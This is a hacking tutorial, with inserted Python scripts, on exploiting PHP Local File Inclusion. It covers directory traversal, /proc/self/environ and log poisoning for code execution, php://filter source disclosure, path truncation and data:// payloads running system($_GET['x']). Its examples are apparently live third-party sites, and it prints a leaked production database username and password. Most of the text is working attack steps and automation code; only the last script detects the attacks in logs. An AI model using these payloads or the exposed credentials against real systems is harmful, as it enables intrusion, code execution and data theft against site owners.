
Local File Inclusion (LFI)


1. Getting RCE with LFI via /proc/self/environ

First, try to fetch /etc/passwd to confirm that the parameter is really vulnerable to directory traversal. On *nix, ../ moves into the parent directory, so add one level at a time until include() resolves to the filesystem root:

http://targetsite/?page=/etc/passwd

http://targetsite/?page=../../../etc/passwd

http://targetsite/?page=../../../../etc/passwd (worked!)

Four levels worked, which means the including script lives four directories below / (the DOCUMENT_ROOT in the dump below, /home/dprdicom/public_html/smscenter, is exactly that deep). Next, read /proc/self/environ with the same prefix:

http://targetsite/?page=../../../../proc/self/environ

That worked too. The file is a NUL-separated list of the process's environment variables, which the browser renders as one long run-together line; split at the NULs it reads:

DOCUMENT_ROOT=/home/dprdicom/public_html/smscenter
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_ACCEPT_ENCODING=gzip,deflate
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5
HTTP_CONNECTION=keep-alive
HTTP_HOST=targetsite
HTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0
PATH=/bin:/usr/bin
PHPRC=/usr/local/lib/
QUERY_STRING=page=../../../../proc/self/environ
REDIRECT_STATUS=200
REMOTE_ADDR=182.68.251.152
REMOTE_PORT=21007
REQUEST_METHOD=GET
REQUEST_URI=/?page=../../../../proc/self/environ
SCRIPT_FILENAME=/home/dprdicom/public_html/smscenter/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=103.28.12.130
SERVER_ADMIN=
SERVER_NAME=targetsite
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.1
SERVER_SIGNATURE=
SERVER_SOFTWARE=Apache
UNIQUE_ID=U@e2lmccDCgAB3SNHk0AAAAa

Do you see 'HTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0' in /proc/self/environ? That is our own User-Agent header, reflected into a file that include() parses as PHP. Because PHP runs as CGI here (GATEWAY_INTERFACE=CGI/1.1), every request gets its own process whose environment carries the request headers, so a PHP tag placed in the User-Agent header is executed when that same request includes /proc/self/environ. (Under mod_php, /proc/self is the long-lived Apache worker, whose environment contains no request headers, and this step fails.) So we modify the User-Agent field, using Live HTTP Headers or Tamper Data, to a PHP payload and request /proc/self/environ again. The header has to stay on a single line, and using <?php instead of the short <? tag avoids depending on short_open_tag.
It worked: phpinfo() ran. Unfortunately we could not execute system commands, because the disable_functions entry in the phpinfo() output showed all the command-execution functions disabled. We could still write files, though, with this User-Agent:
<?php $f = fopen("./lib/xxx.php", "w"); fwrite($f, "<?php phpinfo(); ?>"); fclose($f); phpinfo(); ?>

## I wasn't able to write into the main directory of the website, so I found a directory 'lib' by playing with Google dorks, and it was writable, as you can see. ##

PoC:
http://targetsite/lib/xxx.php
file_put_contents() or a similar function does the same job as the fopen()/fwrite()/fclose() sequence.
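The whole of section 1 as one runnable script, added here as an example; it is not the write-up's own code. It runs against a constructed fake of the vulnerable application (fake_fetch, with a hypothetical layout four directories below /) so it works offline; with a real HTTP client, e.g. requests.get(url, params=params, headers=headers).text, only the fetch callable changes. It uses a split marker instead of phpinfo() so that a server that merely reflects the header back is not mistaken for execution, and it sends the payload header and the include in the same request, which is what the per-process CGI environment requires.

```python
"""Section 1 end to end, against a constructed fake of the vulnerable app."""
import re
from typing import Callable, Dict, Optional

Fetch = Callable[..., str]

# Probe payload: the marker only exists after execution, so a response that
# merely echoes the header back (no execution) does not contain it.
PROBE_PHP = '<?php echo "LFI" . "PROBE"; ?>'
PROBE_MARK = "LFIPROBE"

# --- constructed fake server (hypothetical layout, not the post's target) ---
FAKE_DEPTH = 4   # include() runs from /home/example/public_html/app, 4 levels below /
FAKE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww:x:33:33::/var/www:/usr/sbin/nologin\n"

def fake_fetch(params: Dict[str, str], headers: Optional[Dict[str, str]] = None) -> str:
    """Stand-in for an HTTP GET; emulates include($_GET['page']) under CGI."""
    headers = headers or {}
    parts = params.get("page", "").split("/")
    ups = 0
    while ups < len(parts) and parts[ups] == "..":
        ups += 1
    if ups < FAKE_DEPTH:                       # did not climb all the way to /
        return "Warning: include(): failed to open stream"
    target = "/" + "/".join(parts[ups:])
    if target == "/etc/passwd":
        return FAKE_PASSWD
    if target == "/proc/self/environ":
        env = {"DOCUMENT_ROOT": "/home/example/public_html/app",
               "GATEWAY_INTERFACE": "CGI/1.1",
               "HTTP_USER_AGENT": headers.get("User-Agent", "Mozilla/5.0"),
               "QUERY_STRING": "page=" + params["page"]}
        body = "".join(f"{k}={v}\0" for k, v in env.items())
        # include() executes PHP found in the file; emulated for the probe only
        return body.replace(PROBE_PHP, PROBE_MARK)
    return "Warning: include(): failed to open stream"

# --- attacker side ----------------------------------------------------------
def find_traversal_prefix(fetch: Fetch, param: str = "page",
                          target: str = "/etc/passwd", max_depth: int = 12) -> Optional[str]:
    """Add ../ one level at a time until /etc/passwd comes back."""
    for depth in range(1, max_depth + 1):
        prefix = "../" * depth
        if re.search(r"^root:[^:]*:0:0:", fetch({param: prefix + target.lstrip("/")}), re.M):
            return prefix
    return None

def parse_environ(raw: str) -> Dict[str, str]:
    """/proc/self/environ is NUL separated; browsers render it run together."""
    env: Dict[str, str] = {}
    for entry in raw.split("\0"):
        key, sep, value = entry.partition("=")
        if sep:
            env[key] = value
    return env

def poison_environ(fetch: Fetch, prefix: str, param: str = "page") -> bool:
    """Send the payload header and the include in ONE request: the environment
    belongs to this CGI process, so a header sent earlier is not in it."""
    body = fetch({param: prefix + "proc/self/environ"}, headers={"User-Agent": PROBE_PHP})
    return PROBE_MARK in body and PROBE_PHP not in body

def run_demo(fetch: Fetch = fake_fetch):
    prefix = find_traversal_prefix(fetch)
    env = parse_environ(fetch({"page": prefix + "proc/self/environ"}))
    return prefix, env, poison_environ(fetch, prefix)

if __name__ == "__main__":
    print(run_demo())
```

Once poison_environ() returns True, the User-Agent can carry the file-writing payload from above instead of the probe.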

2. Reading Files via LFI [php://filter]
php://filter is a meta-wrapper designed to permit the application of filters to a stream at
the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and
file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior
to the contents being read.
With it we can read configuration/database.php, or any other PHP file, as source code: a plain include() would execute the file and show only its output, whereas convert.base64-encode hands include() the file's raw bytes as base64 text, which the PHP parser never sees as code. The wrapper reads any file the PHP process may open, not only .php files; its real value is for PHP files, which are otherwise unreadable through an include.
USAGE: php://filter/convert.base64-encode/resource=<file name here>
The vulnerable parameter:
http://www.targetsite.co.in/index.php?token=admission
So let's try loading /etc/passwd:
www.targetsite.co.in/index.php?token=/etc/passwd
Now look at the error:
Warning: include(/etc/passwd.php): failed to open stream: No such file or directory in /home/bihtapub/public_html/index.php on line 72
The application appends '.php' itself. To cut that extension off we use a null byte (%00), which terminated the path in PHP versions before 5.3.4:
http://www.targetsite.co.in/index.php?token=/etc/passwd%00
But still an error:
Failed opening '/etc/passwd', so we are unable to load it. Note that the '.php' is gone, so the null byte did its job; the file itself just cannot be opened from this script (most likely open_basedir or file permissions).
Let's try reading PHP files instead:
http://www.targetsite.co.in/index.php?token=php://filter/convert.base64-encode/resource=index

And yes!
We loaded index.php of the site.
The page shows it base64-encoded, which is easily reversed; decoded it begins:
<?php
include('admin/config.php');
$gallerymenuquery = mysql_query("select * from tbl_folder");
$galleryfirstitem = mysql_fetch_

The first lines reveal where the config file lives, so load that:

http://www.targetsite.co.in/index.php?token=php://filter/convert.base64-encode/resource=admin/config
Base64 encoded:
PD9waHAKJGRiX25hbWU9ImJpaHRhcHViX2RiIjsKaWYoJF9TRVJWRVJbIlNFUlZFUl9BRERSIl09PSIxMjcuMC4wLjEiKQoJJGNvbj1teXNxbF9jb25uZWN0KCJsb2NhbGhvc3QiLCJyb290IiwiIik7CmVsc2UKCSRjb249bXlzcWxfY29ubmVjdCgibG9jYWxob3N0IiwiYmlodGFwdWJfYWRtaW4iLCJCUFNAMjAxMyIpOwppZighJGNvbikKCXsKCWRpZSgiRXJyb3IgaW4gY29ubmVjdGlvbiIubXlzcWxfZXJyb3IoKSk7Cgl9Cm15c3FsX3NlbGVjdF9kYigiJGRiX25hbWUiKW9yIGRpZSgiY2Fubm90IHNlbGVjdCBEQiIpOwo/
Decoded:
<?php
$db_name="bihtapub_db";
if($_SERVER["SERVER_ADDR"]=="127.0.0.1")
	$con=mysql_connect("localhost","root","");
else
	$con=mysql_connect("localhost","bihtapub_admin","BPS@2013");
if(!$con)
	{
	die("Error in connection".mysql_error());
	}
mysql_select_db("$db_name")or die("cannot select DB");
?>
That is the database name, the production MySQL user with its password, and a passwordless root login used when the site is accessed locally.
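An added example (not from the post) that automates this section: it builds the php://filter URL with the .php suffix stripped, picks the base64 blob out of the HTML around it, re-pads and decodes it, and pulls mysql_connect() calls out of the recovered source. The sample input is the admin/config.php blob the post itself recovered, copied from above; the HTML wrapper around it is constructed.

```python
"""php://filter: build the URL, extract and decode the base64, grep credentials."""
import base64
import re
from typing import List, Tuple

def filter_url(base: str, param: str, resource: str) -> str:
    """include() appends '.php' itself (see the /etc/passwd.php error), so the
    resource is passed without its extension."""
    if resource.endswith(".php"):
        resource = resource[:-4]
    return f"{base}?{param}=php://filter/convert.base64-encode/resource={resource}"

def extract_base64(body: str) -> str:
    """The encoded file is the longest base64-looking run in the response."""
    runs = re.findall(r"[A-Za-z0-9+/]{40,}={0,2}", body)
    return max(runs, key=len) if runs else ""

def decode_source(blob: str) -> str:
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)        # re-pad: copied blobs are often cut short
    return base64.b64decode(blob).decode("utf-8", errors="replace")

# mysql_connect("host","user","pass") as written in old-style config files
CRED_RE = re.compile(r'mysql_connect\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')

def db_credentials(php_source: str) -> List[Tuple[str, str, str]]:
    """Every (host, user, password) triple passed to mysql_connect()."""
    return CRED_RE.findall(php_source)

# The admin/config.php blob the post recovered, copied from the write-up above
PAGE_BLOB = (
    "PD9waHAKJGRiX25hbWU9ImJpaHRhcHViX2RiIjsKaWYoJF9TRVJWRVJbIlNF"
    "UlZFUl9BRERSIl09PSIxMjcuMC4wLjEiKQoJJGNvbj1teXNxbF9jb25uZWN0"
    "KCJsb2NhbGhvc3QiLCJyb290IiwiIik7CmVsc2UKCSRjb249bXlzcWxfY29u"
    "bmVjdCgibG9jYWxob3N0IiwiYmlodGFwdWJfYWRtaW4iLCJCUFNAMjAxMyIp"
    "OwppZighJGNvbikKCXsKCWRpZSgiRXJyb3IgaW4gY29ubmVjdGlvbiIubXlz"
    "cWxfZXJyb3IoKSk7Cgl9Cm15c3FsX3NlbGVjdF9kYigiJGRiX25hbWUiKW9y"
    "IGRpZSgiY2Fubm90IHNlbGVjdCBEQiIpOwo/"
)

def demo():
    # constructed: the blob sits inside some page HTML, as a real response would have it
    src = decode_source(extract_base64("<html><body>" + PAGE_BLOB + "</body></html>"))
    url = filter_url("http://www.targetsite.co.in/index.php", "token", "admin/config.php")
    return url, src, db_credentials(src)

if __name__ == "__main__":
    url, src, creds = demo()
    print(url)
    print(src)
    print(creds)
```

Other filters chain the same way (e.g. string.rot13 when base64 is blocked); only the resource part changes between targets.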

3. When the null byte fails or is escaped and the extension cannot be removed
PHP's filesystem functions hold paths in buffers of MAXPATHLEN bytes (4096 on Linux), and old PHP builds silently truncated longer paths at that size instead of rejecting them. So whatever the application appends can be pushed past the end of the buffer by filling it. The ideal filler is a repeated "/." string, and that is what this tutorial uses (Linux servers only).
www.becrux.com/index.php?page=../../../../../../etc/my.cnf
As you can see from the error, the application builds " include(pages/../../../../../../etc/my.cnf/index.php)".
We need to remove '/index.php' from the include(); using the null byte here we see it is simply escaped.
So now we fill up the buffer:
http://www.becrux.com/index.php?page=../../../../../../etc/my.cnf/./
The "/." has to be repeated until the whole path exceeds 4096 bytes; only the first repetition is shown above.
For some reason I don't know, I was not able to load /etc/passwd. Strange.
[#] Thanks to AntiPaste, HackForums, for this buffer-filling method [#]
# If you see a Forbidden error when using ../../, simply URL-encode the sequence (..%2F..%2F) and try again. #
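Added example, not from the tutorial: it builds the padded value for a hypothetical include($dir . $_GET['page'] . '/index.php'), simulates the truncation an affected PHP build performed (the mechanism this section describes, a cut at 4096 bytes; current PHP rejects over-long paths instead), resolves the result the way the kernel would, and URL-encodes a traversal string for the Forbidden case at the end of the section. The include directory and the '/index.php' suffix are assumptions.

```python
"""Path truncation (section 3) and traversal URL encoding (the Forbidden tip)."""
import posixpath
from urllib.parse import quote, unquote

PHP_MAXPATHLEN = 4096   # MAXPATHLEN on Linux; old PHP cut longer paths here instead of failing

def truncation_payload(target: str, ups: int = 6, limit: int = PHP_MAXPATHLEN) -> str:
    """'../' climb to `target`, then '/.' repeated until the value alone exceeds
    `limit`, so anything the application appends lands past the cut."""
    base = "../" * ups + target.lstrip("/")
    repeats = (limit - len(base)) // 2 + 1
    return base + "/." * repeats

def server_side_path(include_dir: str, user_value: str, suffix: str,
                     limit: int = PHP_MAXPATHLEN) -> str:
    """What include($dir . $_GET['page'] . $suffix) actually opened on an
    affected build: the concatenation, cut at the buffer size."""
    return (include_dir + user_value + suffix)[:limit]

def resolved(path: str) -> str:
    """Collapse '..' and '/.' the way the kernel does when opening the file."""
    return posixpath.normpath(path)

def encode_traversal(value: str, double: bool = False) -> str:
    """Percent-encode the slashes so a naive '../' filter does not match;
    PHP decodes %xx once before $_GET is populated. double=True encodes the
    percent signs again for a front end assumed to decode once before forwarding."""
    encoded = quote(value, safe="")
    return quote(encoded, safe="") if double else encoded

def demo():
    # hypothetical application: include("/home/example/public_html/pages/" . $page . "/index.php")
    payload = truncation_payload("/etc/my.cnf")
    seen = server_side_path("/home/example/public_html/pages/", payload, "/index.php")
    return payload, seen, resolved(seen)

if __name__ == "__main__":
    payload, seen, where = demo()
    print(len(payload), "byte parameter ->", where)
    print(encode_traversal("../../etc/passwd"))
```

The payload is a few kilobytes, which fits comfortably in a GET query string for Apache's default 8190-byte request line limit.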

4. Using the data:// wrapper
The data: wrapper lets you inject the PHP code you want executed directly into the URL. It only works when allow_url_include is On (it is Off by default, which is why this method fails on most targets where the previous ones work). Let's see it:
Usage: data:text/plain,<?php phpinfo(); ?>
Or
data:,<?system($_GET['x']);?>&x=ls
Or
data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls
It even supports base64 encoding, which keeps the PHP tags out of the raw URL. The two short <? forms need short_open_tag=On; <?php system($_GET['x']); ?> works regardless (re-encode the base64 accordingly).
So I have a site here =>
http://www.zamenfeld.com.ar/main.php?pagina=publicaciones.html
http://www.zamenfeld.com.ar/main.php?pagina=data:text/plain,<?system($_GET['x']);?>&x=ls
Or
http://www.zamenfeld.com.ar/main.php?pagina=data:,<?system($_GET['x']);?>&x=ls
Or

http://www.zamenfeld.com.ar/main.php?pagina=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls

5. Log Poisoning Method
We use this when /proc/self/environ does not load.
To perform LFI log poisoning you need to be able to include the Apache access or error log. Every request's User-Agent (and request line) is written to the access log, so a request carrying a PHP tag in its User-Agent plants code in the log, and including the log then executes it, exactly as with /proc/self/environ. Unfortunately this has become close to "impossible" on most current Apache installations (the most used web server): the log directory is root-owned and not readable by the web server user, so the include fails before anything runs. Also be careful with the payload: the whole log is parsed on every include, so one syntax error written into it breaks every later attempt.
Some common log files =>
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log
Let's say we can include /var/www/logs/access.log:
http://www.site.com/index.php?page=/var/www/logs/access.log
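The defender's view of sections 4 and 5, as an added example that is not part of the write-up: a scanner over Apache combined-format access log lines that flags the requests each technique on this page produces, including a PHP tag in the User-Agent, which is what a poisoned log line (or a /proc/self/environ poisoning attempt) looks like from the server side. The log lines are constructed for the example.

```python
"""Detection over Apache combined-format access log lines for the requests
the techniques on this page generate, including a poisoned User-Agent."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Patterns that should never appear in a decoded request path
PATH_INDICATORS = {
    "traversal":      re.compile(r"\.\.[/\\]"),
    "proc_environ":   re.compile(r"/proc/self/environ"),
    "php_filter":     re.compile(r"php://filter", re.I),
    "data_wrapper":   re.compile(r"=data:", re.I),
    "log_include":    re.compile(r"/var/log/|/logs/|(?:access|error)[._]log", re.I),
    "sensitive_file": re.compile(r"/etc/(?:passwd|shadow|my\.cnf)"),
}
PHP_TAG = re.compile(r"<\?")   # PHP open tag in a header or parameter

def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry: Dict[str, str]) -> List[str]:
    path = unquote(unquote(entry["path"]))   # undo one or two layers of %xx encoding
    hits = [name for name, rx in PATH_INDICATORS.items() if rx.search(path)]
    if PHP_TAG.search(path):
        hits.append("php_tag_in_path")
    if PHP_TAG.search(entry["ua"]) or PHP_TAG.search(entry["referer"]):
        hits.append("php_tag_in_header")    # log / environ poisoning attempt
    return hits

def scan(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """(client ip, raw path, indicator names) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append((entry["ip"], entry["path"], hits))
    return findings

# Constructed sample: one clean request, then one request per technique above
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2014:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2014:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1402 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2014:10:00:03 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "<?php phpinfo(); ?>"
203.0.113.5 - - [10/Mar/2014:10:00:04 +0000] "GET /index.php?token=php://filter/convert.base64-encode/resource=admin/config HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2014:10:00:05 +0000] "GET /main.php?pagina=data:,<?system($_GET['x']);?>&x=ls HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2014:10:00:06 +0000] "GET /index.php?page=/var/www/logs/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, path, hits)
```

The third sample line is also exactly what a successfully poisoned access log contains, so the same rule catches the planted payload whether the attacker is reading the log or /proc/self/environ.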

Legal Disclaimer: This tutorial is for educational purposes only. The author will not be held responsible for any misuse of it.

If you have any queries, please comment on my posts.
